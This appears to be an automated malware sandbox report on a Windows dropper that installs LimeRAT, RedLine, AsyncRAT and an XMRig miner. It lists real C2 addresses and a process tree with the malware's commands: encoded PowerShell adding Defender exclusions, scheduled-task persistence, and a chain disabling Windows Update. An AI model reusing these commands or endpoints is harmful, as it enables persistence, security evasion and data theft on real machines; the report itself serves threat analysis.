Resubmissions

06-09-2022 03:04

220906-dk2dasbcam 10

24-08-2022 20:26

220824-y7t8qaaffp 10

Analysis

  • max time kernel
    151s
  • max time network
    154s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20220812-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20220812-enlocale:en-usos:windows10-2004-x64system
  • submitted
    06-09-2022 03:04

General

  • Target

    a18193c95d0c31ab132d9bc2da884d7c.exe

  • Size

    22.0MB

  • MD5

    a18193c95d0c31ab132d9bc2da884d7c

  • SHA1

    063e58b4b3b920e68006d4d28625df894e20750a

  • SHA256

    6d6ebf1870d5d9c6bfebdc9fee3a3f381f86b32770f34df41364f905a489486c

  • SHA512

    1c5119a13ddbbe2293759e5cd66de8747abba98d46aa9883c1ccadb489a2cf54be58766aa157fd383a6f631c9265d7b873c068fd992c6dc592ab32a6afd10547

  • SSDEEP

    393216:TJWrtpiMPeMNKxIyMMUGJQmNVmIRKGl5X1+moeWJIYR22uYZm:kpWMtMUJ+KG3XsmOZFpm

Malware Config

Extracted

Family

limerat

Attributes
  • aes_key

    123

  • antivm

    true

  • c2_url

    https://pastebin.com/raw/mchxnAbT

  • delay

    80

  • download_payload

    false

  • install

    true

  • install_name

    WindosCert.exe

  • main_folder

    AppData

  • pin_spread

    true

  • sub_folder

    \

  • usb_spread

    true

Extracted

Family

redline

C2

193.106.191.16:28958

62.204.41.141:24758

193.106.191.106:26883

193.124.22.40:19788

Attributes
  • auth_value

    057b2256d154683c7559f6a91f04717e

Extracted

Family

redline

Botnet

@Miroskati

C2

litrazalilibe.xyz:81

Attributes
  • auth_value

    384ebbf9bd4d7e80bf3269909b298f87

Signatures

  • AsyncRat

    AsyncRAT is designed to remotely monitor and control other computers.

  • LimeRAT

    Simple yet powerful RAT for Windows machines written in .NET.

  • Modifies security service 2 TTPs 5 IoCs
  • RedLine

    RedLine Stealer is a malware family written in C#, first appearing in early 2020.

  • RedLine payload 5 IoCs
  • xmrig

    XMRig is a high performance, open source, cross platform CPU/GPU miner.

  • Async RAT payload 5 IoCs
  • Enumerates VirtualBox registry keys 2 TTPs 10 IoCs
  • Identifies VirtualBox via ACPI registry values (likely anti-VM) 2 TTPs 6 IoCs
  • Looks for VirtualBox Guest Additions in registry 2 TTPs 2 IoCs
  • XMRig Miner payload 3 IoCs
  • Drops file in Drivers directory 2 IoCs
  • Executes dropped EXE 22 IoCs
  • Possible privilege escalation attempt 4 IoCs
  • Stops running service(s) 3 TTPs
  • VMProtect packed file 13 IoCs

    Detects executables packed with VMProtect commercial packer.

  • Checks computer location settings 2 TTPs 10 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Modifies file permissions 1 TTPs 4 IoCs
  • Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
  • Adds Run key to start application 2 TTPs 2 IoCs
  • Checks installed software on the system 1 TTPs

    Looks up Uninstall key entries in the registry to enumerate software on the system.

  • Drops file in System32 directory 4 IoCs
  • Suspicious use of NtSetInformationThreadHideFromDebugger 3 IoCs
  • Suspicious use of SetThreadContext 6 IoCs
  • Drops file in Program Files directory 3 IoCs
  • Launches sc.exe 10 IoCs

    Sc.exe is a Windows utlilty to control services on the system.

  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

  • Program crash 1 IoCs
  • Creates scheduled task(s) 1 TTPs 2 IoCs

    Schtasks is often used by malware for persistence or to perform post-infection execution.

  • Delays execution with timeout.exe 1 IoCs
  • Modifies data under HKEY_USERS 64 IoCs
  • Modifies registry class 1 IoCs
  • Modifies registry key 1 TTPs 18 IoCs
  • Suspicious behavior: EnumeratesProcesses 64 IoCs
  • Suspicious behavior: LoadsDriver 1 IoCs
  • Suspicious use of AdjustPrivilegeToken 64 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\a18193c95d0c31ab132d9bc2da884d7c.exe
    "C:\Users\Admin\AppData\Local\Temp\a18193c95d0c31ab132d9bc2da884d7c.exe"
    1⤵
    • Checks computer location settings
    • Suspicious use of NtSetInformationThreadHideFromDebugger
    • Suspicious behavior: EnumeratesProcesses
    • Suspicious use of WriteProcessMemory
    PID:2556
    • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAHgAdABkACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAHUAZgB0ACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAHQAdQBjACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAHIAdABrACMAPgA="
      2⤵
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      PID:2572
    • C:\Users\Admin\AppData\Local\Temp\1.exe
      "C:\Users\Admin\AppData\Local\Temp\1.exe"
      2⤵
      • Executes dropped EXE
      • Checks computer location settings
      PID:540
      • C:\Windows\SysWOW64\cmd.exe
        "C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /tn "UpdateChromeDay" /tr '"C:\Users\Admin\AppData\Roaming\UpdateChromeDay.exe"' & exit
        3⤵
          PID:407884
          • C:\Windows\SysWOW64\schtasks.exe
            schtasks /create /f /sc onlogon /rl highest /tn "UpdateChromeDay" /tr '"C:\Users\Admin\AppData\Roaming\UpdateChromeDay.exe"'
            4⤵
            • Creates scheduled task(s)
            PID:407972
        • C:\Windows\SysWOW64\cmd.exe
          C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\tmp10B4.tmp.bat""
          3⤵
            PID:407912
            • C:\Windows\SysWOW64\timeout.exe
              timeout 3
              4⤵
              • Delays execution with timeout.exe
              PID:407992
            • C:\Users\Admin\AppData\Roaming\UpdateChromeDay.exe
              "C:\Users\Admin\AppData\Roaming\UpdateChromeDay.exe"
              4⤵
              • Executes dropped EXE
              PID:408144
        • C:\Users\Admin\AppData\Local\Temp\2.exe
          "C:\Users\Admin\AppData\Local\Temp\2.exe"
          2⤵
          • Executes dropped EXE
          • Suspicious use of SetThreadContext
          PID:2148
          • C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
            "C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe"
            3⤵
            • Suspicious behavior: EnumeratesProcesses
            • Suspicious use of AdjustPrivilegeToken
            PID:116408
        • C:\Users\Admin\AppData\Local\Temp\3.exe
          "C:\Users\Admin\AppData\Local\Temp\3.exe"
          2⤵
          • Enumerates VirtualBox registry keys
          • Identifies VirtualBox via ACPI registry values (likely anti-VM)
          • Looks for VirtualBox Guest Additions in registry
          • Executes dropped EXE
          • Checks computer location settings
          • Suspicious use of NtSetInformationThreadHideFromDebugger
          • Modifies registry class
          • Suspicious behavior: EnumeratesProcesses
          PID:100
          • C:\Windows\system32\cmd.exe
            "C:\Windows\system32\cmd.exe" /c del C:\Users\Admin\AppData\Local\Temp\3.exe >> NUL
            3⤵
              PID:399996
            • C:\ProgramData\GeForce\Lib\COM Surrogate.exe
              "C:\ProgramData\GeForce\Lib\COM Surrogate.exe"
              3⤵
              • Enumerates VirtualBox registry keys
              • Identifies VirtualBox via ACPI registry values (likely anti-VM)
              • Looks for VirtualBox Guest Additions in registry
              • Executes dropped EXE
              • Suspicious use of NtSetInformationThreadHideFromDebugger
              • Suspicious behavior: EnumeratesProcesses
              PID:399940
          • C:\Users\Admin\AppData\Local\Temp\5.exe
            "C:\Users\Admin\AppData\Local\Temp\5.exe"
            2⤵
            • Executes dropped EXE
            • Checks computer location settings
            PID:4168
            • C:\Windows\SysWOW64\schtasks.exe
              schtasks /create /f /sc ONLOGON /RL HIGHEST /tn LimeRAT-Admin /tr "'C:\Users\Admin\AppData\Roaming\WindosCert.exe'"
              3⤵
              • Creates scheduled task(s)
              PID:408028
            • C:\Users\Admin\AppData\Roaming\WindosCert.exe
              "C:\Users\Admin\AppData\Roaming\WindosCert.exe"
              3⤵
              • Executes dropped EXE
              PID:408088
          • C:\Users\Admin\AppData\Local\Temp\9.exe
            "C:\Users\Admin\AppData\Local\Temp\9.exe"
            2⤵
            • Executes dropped EXE
            • Suspicious use of SetThreadContext
            • Suspicious use of WriteProcessMemory
            PID:7864
            • C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
              "C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe"
              3⤵
              • Suspicious behavior: EnumeratesProcesses
              • Suspicious use of AdjustPrivilegeToken
              PID:437032
          • C:\Users\Admin\AppData\Local\Temp\7.exe
            "C:\Users\Admin\AppData\Local\Temp\7.exe"
            2⤵
            • Executes dropped EXE
            • Suspicious use of SetThreadContext
            PID:5928
            • C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
              "C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe"
              3⤵
                PID:399728
            • C:\Users\Admin\AppData\Local\Temp\6.exe
              "C:\Users\Admin\AppData\Local\Temp\6.exe"
              2⤵
              • Drops file in Drivers directory
              • Executes dropped EXE
              • Checks computer location settings
              • Suspicious behavior: EnumeratesProcesses
              • Suspicious use of AdjustPrivilegeToken
              • Suspicious use of WriteProcessMemory
              PID:4976
              • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAG4AZwAjAD4AIABBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAHAAYQB1ACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGQAbgAjAD4AIAAtAEYAbwByAGMAZQAgADwAIwBpAGsAcwBsACMAPgA="
                3⤵
                • Suspicious behavior: EnumeratesProcesses
                • Suspicious use of AdjustPrivilegeToken
                PID:22480
              • C:\Windows\System32\cmd.exe
                "C:\Windows\System32\cmd.exe" /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop bits & sc stop dosvc & reg delete HKLM\SYSTEM\CurrentControlSet\Services\UsoSvc /f & reg delete HKLM\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc /f & reg delete HKLM\SYSTEM\CurrentControlSet\Services\wuauserv /f & reg delete HKLM\SYSTEM\CurrentControlSet\Services\bits /f & reg delete HKLM\SYSTEM\CurrentControlSet\Services\dosvc /f & takeown /f %SystemRoot%\System32\WaaSMedicSvc.dll & icacls %SystemRoot%\System32\WaaSMedicSvc.dll /grant *S-1-1-0:F /t /c /l /q & rename %SystemRoot%\System32\WaaSMedicSvc.dll WaaSMedicSvc_BAK.dll & reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v AUOptions /d 2 /t REG_DWORD /f & reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v AutoInstallMinorUpdates /d 0 /t REG_DWORD /f & reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v NoAutoUpdate /d 1 /t REG_DWORD /f & reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v NoAutoRebootWithLoggedOnUsers /d 1 /t REG_DWORD /f & SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\Automatic App Update" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\Scheduled Start" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\sih" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\sihboot" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistant" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistantCalendarRun" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistantWakeupRun" /DISABLE
                3⤵
                  PID:404868
                  • C:\Windows\system32\sc.exe
                    sc stop UsoSvc
                    4⤵
                    • Launches sc.exe
                    PID:405092
                  • C:\Windows\system32\sc.exe
                    sc stop WaaSMedicSvc
                    4⤵
                    • Launches sc.exe
                    PID:405180
                  • C:\Windows\system32\sc.exe
                    sc stop wuauserv
                    4⤵
                    • Launches sc.exe
                    PID:405276
                  • C:\Windows\system32\sc.exe
                    sc stop bits
                    4⤵
                    • Launches sc.exe
                    PID:405364
                  • C:\Windows\system32\sc.exe
                    sc stop dosvc
                    4⤵
                    • Launches sc.exe
                    PID:405440
                  • C:\Windows\system32\reg.exe
                    reg delete HKLM\SYSTEM\CurrentControlSet\Services\UsoSvc /f
                    4⤵
                    • Modifies registry key
                    PID:405476
                  • C:\Windows\system32\reg.exe
                    reg delete HKLM\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc /f
                    4⤵
                    • Modifies registry key
                    PID:405520
                  • C:\Windows\system32\reg.exe
                    reg delete HKLM\SYSTEM\CurrentControlSet\Services\wuauserv /f
                    4⤵
                    • Modifies security service
                    • Modifies registry key
                    PID:405552
                  • C:\Windows\system32\reg.exe
                    reg delete HKLM\SYSTEM\CurrentControlSet\Services\bits /f
                    4⤵
                    • Modifies registry key
                    PID:405584
                  • C:\Windows\system32\reg.exe
                    reg delete HKLM\SYSTEM\CurrentControlSet\Services\dosvc /f
                    4⤵
                    • Modifies registry key
                    PID:405628
                  • C:\Windows\system32\takeown.exe
                    takeown /f C:\Windows\System32\WaaSMedicSvc.dll
                    4⤵
                    • Possible privilege escalation attempt
                    • Modifies file permissions
                    • Suspicious use of AdjustPrivilegeToken
                    PID:405704
                  • C:\Windows\system32\icacls.exe
                    icacls C:\Windows\System32\WaaSMedicSvc.dll /grant *S-1-1-0:F /t /c /l /q
                    4⤵
                    • Possible privilege escalation attempt
                    • Modifies file permissions
                    PID:405828
                  • C:\Windows\system32\reg.exe
                    reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v AUOptions /d 2 /t REG_DWORD /f
                    4⤵
                    • Modifies registry key
                    PID:406072
                  • C:\Windows\system32\reg.exe
                    reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v AutoInstallMinorUpdates /d 0 /t REG_DWORD /f
                    4⤵
                    • Modifies registry key
                    PID:406104
                  • C:\Windows\system32\reg.exe
                    reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v NoAutoUpdate /d 1 /t REG_DWORD /f
                    4⤵
                    • Modifies registry key
                    PID:406144
                  • C:\Windows\system32\reg.exe
                    reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v NoAutoRebootWithLoggedOnUsers /d 1 /t REG_DWORD /f
                    4⤵
                    • Modifies registry key
                    PID:406188
                  • C:\Windows\system32\schtasks.exe
                    SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\Automatic App Update" /DISABLE
                    4⤵
                      PID:406220
                    • C:\Windows\system32\schtasks.exe
                      SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\Scheduled Start" /DISABLE
                      4⤵
                        PID:406280
                      • C:\Windows\system32\schtasks.exe
                        SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\sih" /DISABLE
                        4⤵
                          PID:406360
                        • C:\Windows\system32\schtasks.exe
                          SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\sihboot" /DISABLE
                          4⤵
                            PID:406444
                          • C:\Windows\system32\schtasks.exe
                            SCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistant" /DISABLE
                            4⤵
                              PID:406508
                            • C:\Windows\system32\schtasks.exe
                              SCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistantWakeupRun" /DISABLE
                              4⤵
                                PID:406592
                              • C:\Windows\system32\schtasks.exe
                                SCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistantCalendarRun" /DISABLE
                                4⤵
                                  PID:406572
                              • C:\Windows\System32\cmd.exe
                                "C:\Windows\System32\cmd.exe" /c powercfg /x -hibernate-timeout-ac 0 & powercfg /x -hibernate-timeout-dc 0 & powercfg /x -standby-timeout-ac 0 & powercfg /x -standby-timeout-dc 0
                                3⤵
                                  PID:404924
                                  • C:\Windows\system32\powercfg.exe
                                    powercfg /x -hibernate-timeout-ac 0
                                    4⤵
                                    • Suspicious use of AdjustPrivilegeToken
                                    PID:405136
                                  • C:\Windows\system32\powercfg.exe
                                    powercfg /x -hibernate-timeout-dc 0
                                    4⤵
                                    • Suspicious use of AdjustPrivilegeToken
                                    PID:405212
                                  • C:\Windows\system32\powercfg.exe
                                    powercfg /x -standby-timeout-ac 0
                                    4⤵
                                    • Suspicious use of AdjustPrivilegeToken
                                    PID:405320
                                  • C:\Windows\system32\powercfg.exe
                                    powercfg /x -standby-timeout-dc 0
                                    4⤵
                                    • Suspicious use of AdjustPrivilegeToken
                                    PID:405388
                                • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGcAcQAjAD4AIABSAGUAZwBpAHMAdABlAHIALQBTAGMAaABlAGQAdQBsAGUAZABUAGEAcwBrACAALQBBAGMAdABpAG8AbgAgACgATgBlAHcALQBTAGMAaABlAGQAdQBsAGUAZABUAGEAcwBrAEEAYwB0AGkAbwBuACAALQBFAHgAZQBjAHUAdABlACAAJwBwAG8AdwBlAHIAcwBoAGUAbABsACcAIAAtAEEAcgBnAHUAbQBlAG4AdAAgACcALQBFAG4AYwBvAGQAZQBkAEMAbwBtAG0AYQBuAGQAIAAiAFAAQQBBAGoAQQBIAEUAQQBZAGcAQQBqAEEARAA0AEEASQBBAEIAVABBAEgAUQBBAFkAUQBCAHkAQQBIAFEAQQBMAFEAQgBRAEEASABJAEEAYgB3AEIAagBBAEcAVQBBAGMAdwBCAHoAQQBDAEEAQQBMAFEAQgBHAEEARwBrAEEAYgBBAEIAbABBAEYAQQBBAFkAUQBCADAAQQBHAGcAQQBJAEEAQQBuAEEARQBNAEEATwBnAEIAYwBBAEYAQQBBAGMAZwBCAHYAQQBHAGMAQQBjAGcAQgBoAEEARwAwAEEASQBBAEIARwBBAEcAawBBAGIAQQBCAGwAQQBIAE0AQQBYAEEAQgBIAEEARwA4AEEAYgB3AEIAbgBBAEcAdwBBAFoAUQBCAGMAQQBFAE0AQQBhAEEAQgB5AEEARwA4AEEAYgBRAEIAbABBAEYAdwBBAGQAUQBCAHcAQQBHAFEAQQBZAFEAQgAwAEEARwBVAEEAYwBnAEEAdQBBAEcAVQBBAGUAQQBCAGwAQQBDAGMAQQBJAEEAQQB0AEEARgBZAEEAWgBRAEIAeQBBAEcASQBBAEkAQQBCAFMAQQBIAFUAQQBiAGcAQgBCAEEASABNAEEASQBBAEEAOABBAEMATQBBAGQAZwBCAHMAQQBHAFEAQQBjAFEAQQBqAEEARAA0AEEAIgAnACkAIAA8ACMAdQBzACMAPgAgAC0AVAByAGkAZwBnAGUAcgAgACgATgBlAHcALQBTAGMAaABlAGQAdQBsAGUAZABUAGEAcwBrAFQAcgBpAGcAZwBlAHIAIAAtAEEAdABTAHQAYQByAHQAdQBwACkAIAA8ACMAcQBvAHMAIwA+ACAALQBTAGUAdAB0AGkAbgBnAHMAIAAoAE4AZQB3AC0AUwBjAGgAZQBkAHUAbABlAGQAVABhAHMAawBTAGUAdAB0AGkAbgBnAHMAUwBlAHQAIAAtAEEAbABsAG8AdwBTAHQAYQByAHQASQBmAE8AbgBCAGEAdAB0AGUAcgBpAGUAcwAgAC0ARABpAHMAYQBsAGwAbwB3AEgAYQByAGQAVABlAHIAbQBpAG4AYQB0AGUAIAAtAEQAbwBuAHQAUwB0AG8AcABJAGYARwBvAGkAbgBnAE8AbgBCAGEAdAB0AGUAcgBpAGUAcwAgAC0ARABvAG4AdABTAHQAbwBwAE8AbgBJAGQAbABlAEUAbgBkACAALQBFAHgAZQBjAHUAdABpAG8AbgBUAGkAbQBlAEwAaQBtAGkAdAAgACgATgBlAHcALQBUAGkAbQBlAFMAcABhAG4AIAAtAEQAYQB5AHMAIAAxADAAMAAwACkAKQAgADwAIwBpAGkAbwBhACMAPgAgAC0AVABhAHMAawBOAGEAbQBlACAAJwBHAG8AbwBnAGwAZQBVAHAAZABhAHQAZQBUAGEAcwBrAE0AYQBjAGgAaQBuAGUAUQBDACcAIAAtAFUAcwBlAHIAIAAnAFMAeQBzAHQAZQBtACcAIAAtAFIAdQBuAEwAZQB2AGUAbAAgACcASABpAGcAaABlAHMAdAAnACAALQBGAG8AcgBjAGUAIAA8ACMAcQB1ACMAPgA7ACAAQwBvAHAAeQAtAEkAdABlAG0AIAAnAEMAOgBcAFUAcwBlAHIAcwBcAEEAZABtAGkAbgBcAEEAcABwAEQAYQB0AGEAXABMAG8AYwBhAGwAXABUAGUAbQBwAFwANgAuAGUAeABlACcAIAAtAEQAZQBzAHQAaQBuAGEAdABpAG8AbgAgACcAQwA6AFwAUAByAG8AZwByAGEAbQAgAEYAaQBsAGUAcwBcAEcAbwBvAGcAbABlAFwAQwBoAHIAbwBtAGUAXAB1AHAAZABhAHQAZQByAC4AZQB4AGUAJwAgAC0ARgBvAHIAYwBlACAAPAAjAGYAdAB6AGIAIwA+ADsAIABTAHQAYQByAHQALQBTAGMAaABlAGQAdQBsAGUAZABUAGEAcwBrACAAPAAjAHMAZgAjAD4AIAAtAFQAYQBzAGsATgBhAG0AZQAgACcARwBvAG8AZwBsAGUAVQBwAGQAYQB0AGUAVABhAHMAawBNAGEAYwBoAGkAbgBlAFEAQwAnADsA"
                                  3⤵
                                  • Drops file in Program Files directory
                                  • Suspicious behavior: EnumeratesProcesses
                                  • Suspicious use of AdjustPrivilegeToken
                                  PID:405724
                              • C:\Users\Admin\AppData\Local\Temp\11.exe
                                "C:\Users\Admin\AppData\Local\Temp\11.exe"
                                2⤵
                                • Executes dropped EXE
                                • Suspicious use of SetThreadContext
                                • Suspicious use of WriteProcessMemory
                                PID:14084
                                • C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
                                  "C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe"
                                  3⤵
                                  • Suspicious behavior: EnumeratesProcesses
                                  • Suspicious use of AdjustPrivilegeToken
                                  PID:199320
                              • C:\Users\Admin\AppData\Local\Temp\v0.7.exe
                                "C:\Users\Admin\AppData\Local\Temp\v0.7.exe"
                                2⤵
                                • Executes dropped EXE
                                • Checks computer location settings
                                • Suspicious use of WriteProcessMemory
                                PID:18688
                                • C:\Users\Admin\AppData\Local\Temp\Setup.exe
                                  "C:\Users\Admin\AppData\Local\Temp\Setup.exe"
                                  3⤵
                                  • Executes dropped EXE
                                  • Checks computer location settings
                                  • Adds Run key to start application
                                  • Suspicious use of WriteProcessMemory
                                  PID:107740
                                  • C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Templates\svchost.exe
                                    "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Templates\svchost.exe"
                                    4⤵
                                    • Executes dropped EXE
                                    • Checks computer location settings
                                    • Suspicious use of WriteProcessMemory
                                    PID:187028
                                    • C:\Users\Admin\AppData\Roaming\Microsoft\Windows\8.1.7601.17587\svchost.exe
                                      "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\8.1.7601.17587\svchost.exe"
                                      5⤵
                                      • Executes dropped EXE
                                      • Suspicious use of AdjustPrivilegeToken
                                      PID:213364
                                • C:\Users\Admin\AppData\Local\Temp\Setup.exe
                                  "C:\Users\Admin\AppData\Local\Temp\Setup.exe"
                                  3⤵
                                  • Executes dropped EXE
                                  • Checks computer location settings
                                  • Adds Run key to start application
                                  • Suspicious use of WriteProcessMemory
                                  PID:135120
                                  • C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Templates\svchost.exe
                                    "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Templates\svchost.exe"
                                    4⤵
                                    • Executes dropped EXE
                                    • Checks computer location settings
                                    • Suspicious use of WriteProcessMemory
                                    PID:198272
                                    • C:\Users\Admin\AppData\Roaming\Microsoft\Windows\8.1.7601.17587\svchost.exe
                                      "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\8.1.7601.17587\svchost.exe"
                                      5⤵
                                      • Executes dropped EXE
                                      • Suspicious use of AdjustPrivilegeToken
                                      PID:244212
                                • C:\Users\Admin\AppData\Local\Temp\SLAYER Leecher v0.7 .exe
                                  "C:\Users\Admin\AppData\Local\Temp\SLAYER Leecher v0.7 .exe"
                                  3⤵
                                  • Executes dropped EXE
                                  PID:161724
                                  • C:\Windows\system32\WerFault.exe
                                    C:\Windows\system32\WerFault.exe -u -p 161724 -s 972
                                    4⤵
                                    • Program crash
                                    PID:200044
                              • C:\Users\Admin\AppData\Local\Temp\8.exe
                                "C:\Users\Admin\AppData\Local\Temp\8.exe"
                                2⤵
                                • Executes dropped EXE
                                • Suspicious use of SetThreadContext
                                • Suspicious use of WriteProcessMemory
                                PID:14152
                                • C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
                                  "C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe"
                                  3⤵
                                    PID:287380
                                • C:\Users\Admin\AppData\Local\Temp\10.exe
                                  "C:\Users\Admin\AppData\Local\Temp\10.exe"
                                  2⤵
                                  • Executes dropped EXE
                                  PID:14184
                              • C:\Windows\system32\WerFault.exe
                                C:\Windows\system32\WerFault.exe -pss -s 420 -p 161724 -ip 161724
                                1⤵
                                  PID:190496
                                • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE
                                  C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE -EncodedCommand "PAAjAHEAYgAjAD4AIABTAHQAYQByAHQALQBQAHIAbwBjAGUAcwBzACAALQBGAGkAbABlAFAAYQB0AGgAIAAnAEMAOgBcAFAAcgBvAGcAcgBhAG0AIABGAGkAbABlAHMAXABHAG8AbwBnAGwAZQBcAEMAaAByAG8AbQBlAFwAdQBwAGQAYQB0AGUAcgAuAGUAeABlACcAIAAtAFYAZQByAGIAIABSAHUAbgBBAHMAIAA8ACMAdgBsAGQAcQAjAD4A"
                                  1⤵
                                  • Drops file in System32 directory
                                  • Modifies data under HKEY_USERS
                                  • Suspicious behavior: EnumeratesProcesses
                                  PID:406252
                                  • C:\Program Files\Google\Chrome\updater.exe
                                    "C:\Program Files\Google\Chrome\updater.exe"
                                    2⤵
                                    • Drops file in Drivers directory
                                    • Executes dropped EXE
                                    • Drops file in System32 directory
                                    • Suspicious use of SetThreadContext
                                    • Drops file in Program Files directory
                                    • Modifies data under HKEY_USERS
                                    • Suspicious behavior: EnumeratesProcesses
                                    PID:406676
                                    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAG4AZwAjAD4AIABBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAHAAYQB1ACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGQAbgAjAD4AIAAtAEYAbwByAGMAZQAgADwAIwBpAGsAcwBsACMAPgA="
                                      3⤵
                                      • Drops file in System32 directory
                                      • Modifies data under HKEY_USERS
                                      • Suspicious behavior: EnumeratesProcesses
                                      PID:406744
                                    • C:\Windows\System32\cmd.exe
                                      "C:\Windows\System32\cmd.exe" /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop bits & sc stop dosvc & reg delete HKLM\SYSTEM\CurrentControlSet\Services\UsoSvc /f & reg delete HKLM\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc /f & reg delete HKLM\SYSTEM\CurrentControlSet\Services\wuauserv /f & reg delete HKLM\SYSTEM\CurrentControlSet\Services\bits /f & reg delete HKLM\SYSTEM\CurrentControlSet\Services\dosvc /f & takeown /f %SystemRoot%\System32\WaaSMedicSvc.dll & icacls %SystemRoot%\System32\WaaSMedicSvc.dll /grant *S-1-1-0:F /t /c /l /q & rename %SystemRoot%\System32\WaaSMedicSvc.dll WaaSMedicSvc_BAK.dll & reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v AUOptions /d 2 /t REG_DWORD /f & reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v AutoInstallMinorUpdates /d 0 /t REG_DWORD /f & reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v NoAutoUpdate /d 1 /t REG_DWORD /f & reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v NoAutoRebootWithLoggedOnUsers /d 1 /t REG_DWORD /f & SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\Automatic App Update" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\Scheduled Start" /DISABLE & SCHTASKS /Change /TN 